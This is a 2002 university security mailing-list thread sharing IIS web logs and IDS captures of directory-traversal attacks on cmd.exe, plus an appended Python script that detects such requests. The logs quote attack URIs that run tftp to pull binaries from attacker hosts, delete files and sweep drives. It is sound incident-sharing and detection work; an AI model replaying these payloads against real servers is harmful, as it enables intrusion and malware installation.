[unisog] increasing cmd.exe port 80/tcp probes

Young, Beth A. youngba at more.net
Tue Jun 4 17:41:29 GMT 2002


We had a server with the Serv-U ftp installed that was done through a tftp install.

Partial log of the first part of their scan:
68.4.53.105, -, 5/21/02, 15:00:48, W3SVC1, PSYSERVER, 150.200.203.1, 31, 126, 418, 502, 0, GET, /scripts/.%2e/.%2e/winnt/system32/cmd.exe, -, -, /c+dir+v:\,
68.4.53.105, -, 5/21/02, 15:00:48, W3SVC1, PSYSERVER, 150.200.203.1, 31, 126, 418, 502, 0, GET, /scripts/.%2e/.%2e/winnt/system32/cmd.exe, -, -, /c+dir+w:\,
68.4.53.105, -, 5/21/02, 15:00:48, W3SVC1, PSYSERVER, 150.200.203.1, 47, 126, 418, 502, 0, GET, /scripts/.%2e/.%2e/winnt/system32/cmd.exe, -, -, /c+dir+x:\,
68.4.53.105, -, 5/21/02, 15:00:48, W3SVC1, PSYSERVER, 150.200.203.1, 31, 126, 418, 502, 0, GET, /scripts/.%2e/.%2e/winnt/system32/cmd.exe, -, -, /c+dir+y:\,
68.4.53.105, -, 5/21/02, 15:00:48, W3SVC1, PSYSERVER, 150.200.203.1, 47, 126, 418, 502, 0, GET, /scripts/.%2e/.%2e/winnt/system32/cmd.exe, -, -, /c+dir+z:\

Interestingly enough, they started with C: and went all the way through Z:

68.4.53.105, -, 5/21/02, 16:23:05, W3SVC1, PSYSERVER, 150.200.203.1, 250, 439, 374, 502, 0, GET, /scripts/..%5c..%5cwinnt/system32/cmd.exe, Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; T312461), -, /c+tftp.exe+"-i"+68.4.53.105+GET+nux.asp+c:\scripts\nux.asp,
68.4.53.105, -, 5/21/02, 16:23:13, W3SVC1, PSYSERVER, 150.200.203.1, 47, 259, 957, 200, 0, GET, /scripts/..%5c..%5cwinnt/system32/cmd.exe, Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; T312461), -, /c+dir+c:,
68.4.53.105, -, 5/21/02, 16:23:18, W3SVC1, PSYSERVER, 150.200.203.1, 594, 350, 244, 200, 0, GET, /scripts/nux.asp, Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; T312461), -, -,

Then somebody came back later and did this:

203.194.8.40, 6/1/02, 8:58:19, 502, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+c:\winnt\system32\tftp.exe+%22-i%22+203.194.8.40+get+TLIST.EXE+c:\TLIST.EXE
203.194.8.40, 6/1/02, 8:58:28, 502, GET, /msadc/..%2f..%2f..%2f..%2f/TLIST.EXE, -
203.194.8.40, 6/1/02, 8:59:15, 404, GET, /msadc/..%2f..%2f..%2f..%2f/KILL.EXE, 321
203.194.8.40, 6/1/02, 8:59:19, 502, GET, /msadc/..%2f..%2f..%2f..%2f/TLIST.EXE, -
203.194.8.40, 6/1/02, 8:59:51, 502, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+c:\winnt\system32\tftp.exe+%22-i%22+203.194.8.40+get+KILL.EXE+c:\KILL.EXE
203.194.8.40, 6/1/02, 9:00:01, 502, GET, /msadc/..%2f..%2f..%2f..%2f/TLIST.exe, -
203.194.8.40, 6/1/02, 9:00:12, 502, GET, /msadc/..%2f..%2f..%2f..%2f/KILL.exe, 321
203.194.8.40, 6/1/02, 9:00:12, 502, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+c:\WINMGNT.EXE%20/h
203.194.8.40, 6/1/02, 9:01:27, 502, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+del+c:\sys.exe
203.194.8.40, 6/1/02, 9:01:35, 502, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+del+c:\WINMGNT.EXE
203.194.8.40, 6/1/02, 9:01:41, 502, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+del+c:\sys.exe
203.194.8.40, 6/1/02, 9:01:57, 200, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+dir+c:\winnt\
203.194.8.40, 6/1/02, 9:02:41, 502, GET, /msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe, /c+dir+c:\winnt\WINMGNT.EXE%20/h

After this was discovered, that site also blocked tftp at the border.

Beth


>-----Original Message-----
>From: Mike Iglesias [mailto:iglesias at draco.acs.uci.edu]
>Sent: Tuesday, June 04, 2002 12:06 PM
>To: Jeff Anderson-Lee
>Cc: unisog at sans.org
>Subject: Re: [unisog] increasing cmd.exe port 80/tcp probes 
>
>
>We're seeing much more scanning on port 80 than usual, and when a vulnerable
>IIS server is found they try to get it to tftp a file (we have tftp
>blocked at the border so it doesn't work).
>
>Here are some of the patterns our IDS picked up:
>
>HEAD /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/ HTTP/1.0
>HEAD /scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:/ HTTP/1.0
>GET /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1
>
>and then this one was used recently to start the tftp...
>
>GET /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+Data2k.homeftp.net+get+WINMGNT.EXE+c:\WINMGNT.EXE HTTP/1.1{D}{A}
>
>data2k.homeftp.net is another name for p5084D684.dip.t-dialin.net (ip
>address 80.132.214.142).
>
>
>Mike Iglesias                          Internet:    
>iglesias at draco.acs.uci.edu
>University of California, Irvine       phone:       949-824-6926
>Network & Academic Computing Services  FAX:         949-824-2069
>
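An added example, not part of either poster's message, that runs the detection logic this thread describes over constructed request URIs modelled on the IIS log lines and IDS captures above: it percent-decodes until stable (so %255c, %25%35%63 and %%35%63 all collapse to a backslash), then flags traversal to cmd.exe, the drive-letter "dir" sweep, and tftp staging. The function names and the 192.0.2.10 placeholder address are my own choices, not anything from the thread.

```python
import re
from urllib.parse import unquote

# Constructed sample request URIs modelled on the shapes in the logs above;
# 192.0.2.10 is a documentation placeholder, not a real source address.
SAMPLE_REQUESTS = [
    "/scripts/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+v:\\",
    "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/",
    "/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+c:\\winnt\\system32"
    "\\tftp.exe+\"-i\"+192.0.2.10+get+WINMGNT.EXE+c:\\WINMGNT.EXE",
    "/msadc/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+del+c:\\sys.exe",
    "/index.html",
    "/scripts/report.asp?id=5",
]

def canonicalize(text: str) -> str:
    """Percent-decode until stable (%255c, %25%35%63 and %%35%63 all need two
    passes), then fold case and map backslashes to slashes."""
    cur = text
    for _ in range(4):  # bounded; over-decoding is acceptable for a detector
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur.lower().replace("\\", "/")

def classify(request: str) -> dict:
    """Break a request URI into the indicators the thread describes."""
    path, _, query = request.partition("?")
    cpath = canonicalize(path)
    cquery = canonicalize(query).replace("+", " ")
    return {
        "traversal": "/../" in cpath,           # ..\ or ../ escape from /scripts or /msadc
        "cmd_exe": cpath.endswith("/cmd.exe"),  # reaching the shell through the vdir
        "dir_probe": re.search(r"\bdir\s+[a-z]:", cquery) is not None,
        "tftp_pull": "tftp" in cquery,          # staging a binary with tftp -i ... get
    }

def verdict(request: str) -> str:
    f = classify(request)
    if f["traversal"] and f["cmd_exe"]:
        return "tftp-staging" if f["tftp_pull"] else "cmd-probe"
    return "benign"

def scan(requests) -> dict:
    """Map each non-benign request URI to its verdict."""
    return {r: verdict(r) for r in requests if verdict(r) != "benign"}
```

Calling `scan(SAMPLE_REQUESTS)` returns the four attack-shaped URIs with their verdicts and drops the two ordinary ones; feeding it the cs-uri-stem and cs-uri-query fields from a real IIS log is the intended use.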


